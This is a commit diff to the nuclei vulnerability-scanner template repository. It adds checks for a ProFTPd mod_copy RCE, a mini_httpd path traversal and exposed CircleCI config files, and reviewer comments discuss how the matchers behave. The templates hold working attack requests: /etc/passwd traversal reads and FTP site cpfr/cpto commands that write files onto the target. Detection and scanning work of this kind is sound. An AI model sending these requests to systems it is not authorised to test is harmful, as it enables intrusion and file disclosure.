Noam Rathaus 2021-03-11 18:09:44 +02:00
commit f343a4d311
10 changed files with 109 additions and 4 deletions


@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts | | Templates | Counts | Templates | Counts | Templates | Counts |
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
| cves | 235 | vulnerabilities | 105 | exposed-panels | 104 | | cves | 237 | vulnerabilities | 105 | exposed-panels | 104 |
| exposures | 61 | technologies | 50 | misconfiguration | 54 | | exposures | 63 | technologies | 50 | misconfiguration | 54 |
| workflows | 23 | miscellaneous | 16 | default-logins | 19 | | workflows | 23 | miscellaneous | 16 | default-logins | 19 |
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
| helpers | 2 | takeovers | 1 | - | - | | helpers | 2 | takeovers | 1 | - | - |
**75 directories, 712 files**. **75 directories, 716 files**.
</td> </td>
</tr> </tr>


@ -9,6 +9,7 @@ requests:
- raw: - raw:
- | - |
GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1 GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
matchers-condition: and matchers-condition: and


@ -0,0 +1,27 @@
id: CVE-2015-3306
info:
name: ProFTPd RCE
author: pd-team
severity: high
reference: https://github.com/t0kx/exploit-CVE-2015-3306
tags: cve,cve2015,ftp,rce,network
network:
- inputs:
- data: "site cpfr /proc/self/cmdline\r\n"
read: 1024
- data: "site cpto /tmp/.{{randstr}}\r\n"
read: 1024
- data: "site cpfr /tmp/.{{randstr}}\r\n"
read: 1024
- data: "site cpto /var/www/html/{{randstr}}\r\n"
host:
- "{{Hostname}}:21"
read-size: 1024
matchers:
- type: word
words:
- "Copy successful"
part: raw
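Review bot: The `Copy successful` word matcher on `part: raw` fires on the first successful `site cpto` (the copy into `/tmp`), so the final copy into `/var/www/html/{{randstr}}` is never actually verified and only leaves a second artifact on the target; both `/tmp/.{{randstr}}` and the webroot file are written and nothing removes them. For a detection template the `/tmp` round-trip is sufficient evidence of unauthenticated mod_copy, so I would drop the `cpfr /tmp` / `cpto /var/www/html` pair (the last three `data:` inputs), or, if the webroot write is kept to demonstrate the RCE path, state in `info` that the scan leaves files on the host and where. The sequence also assumes `{{randstr}}` expands to the same value in every input of this request — presumably it does, but worth confirming, since otherwise the second `cpfr` names a file that does not exist. The hard-coded `/var/www/html` is a Debian/Apache layout; elsewhere that copy fails while the matcher still reports the host as vulnerable.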


@ -0,0 +1,24 @@
id: CVE-2018-18778
info:
name: mini_httpd Path Traversal
author: dhiyaneshDK
severity: high
reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/
tags: cve,cve2018,lfi
requests:
- raw:
- |+
GET /etc/passwd HTTP/1.1
Host:
Content-Length: 4
unsafe: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
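Review bot: The empty `Host:` header on the raw request is the substance of this check (presumably mini_httpd's virtual-host path handling, per the Acunetix reference — the template itself does not say), yet nothing marks it as deliberate, and this same commit "fixes" another raw request by adding `Host: {{Hostname}}`; a later cleanup could silently neuter this template. I would add a comment above the request, `# Host is intentionally empty - the file read depends on mini_httpd's handling of a missing virtual host; do not add {{Hostname}}`, and a `description:` line in `info` saying the same. The request also declares `Content-Length: 4` with no visible body; unless the `|+` block scalar retains enough trailing newlines to supply those bytes, some servers will wait for the body, so confirm the header is required by the PoC or drop it. `unsafe: true` is appropriate here, since a normalising HTTP client would not send an empty Host.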


@ -33,6 +33,7 @@ requests:
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Upgrade-Insecure-Requests: 1 Upgrade-Insecure-Requests: 1
req-condition: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: dsl - type: dsl


@ -11,6 +11,7 @@ requests:
- "{{BaseURL}}/IdentityGuardSelfService/" - "{{BaseURL}}/IdentityGuardSelfService/"
- "{{BaseURL}}/IdentityGuardSelfService/images/favicon.ico" - "{{BaseURL}}/IdentityGuardSelfService/images/favicon.ico"
req-condition: true
redirects: true redirects: true
max-redirects: 2 max-redirects: 2
matchers: matchers:


@ -0,0 +1,24 @@
id: circleci-config
info:
name: circleci config.yml exposure
author: geeknik
severity: low
reference: https://circleci.com/docs/2.0/sample-config/
requests:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/.circleci/config.yml"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'regex("^version: ", body) && contains(body, "jobs:") == true'
- type: status
status:
- 200
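Review bot: `regex("^version: ", body)` anchors `^` to the very start of the body in Go's RE2 syntax, so a config.yml that opens with a comment, a `---` document marker or a BOM is missed even though the file is fully exposed. `(?m)^version:` matches at any line start, and `contains(body, "jobs:") == true` can simply be `contains(body, "jobs:")`. The `info` block has no `tags:` while the CVE templates in this commit all carry them (e.g. `tags: cve,cve2018,lfi`); a `tags: exposure,circleci` line keeps it filterable alongside the other exposure checks. Severity `low` is arguable — a CI config commonly reveals internal hostnames, build steps and the names of the secrets in use — but I would leave the rating to the maintainers.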


@ -0,0 +1,26 @@
id: circleci-ssh-config
info:
name: circleci ssh-config exposure
author: geeknik
severity: low
requests:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/.circleci/ssh-config"
matchers-condition: and
matchers:
- type: word
words:
- "Host"
- "HostName"
- "IdentityFile"
condition: and
- type: status
status:
- 200
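Review bot: The three-word `and` matcher is weaker than it looks: `Host` is a substring of `HostName`, so the first word never adds a constraint, and a 200 reached after up to three redirects (`max-redirects: 3`) that lands on an HTML help page mentioning `HostName` and `IdentityFile` matches as well. A line-anchored regex matcher, `regex: ['(?m)^\s*Host\s', '(?m)^\s*IdentityFile\s']` with `condition: and`, checks the actual ssh_config structure rather than its vocabulary. `info` has neither `reference:` nor `tags:`, unlike the CVE templates in this commit; at minimum add `tags: exposure,circleci` and a pointer to the CircleCI documentation this file format comes from. If the exposed `IdentityFile` points inside the repository, the key itself may be served from the same directory — worth a sentence in a `description:`, since that is what would make this finding more than `low`.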


@ -46,8 +46,8 @@ requests:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9 Accept-Language: en-US,en;q=0.9
req-condition: true
matchers: matchers:
- type: dsl - type: dsl
name: iis-scan
dsl: dsl:
- "status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404" - "status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404"


@ -19,6 +19,7 @@ requests:
GET /testing-put.txt HTTP/1.1 GET /testing-put.txt HTTP/1.1
Content-Type: text/plain Content-Type: text/plain
req-condition: true
matchers: matchers:
- type: dsl - type: dsl
name: multi-req name: multi-req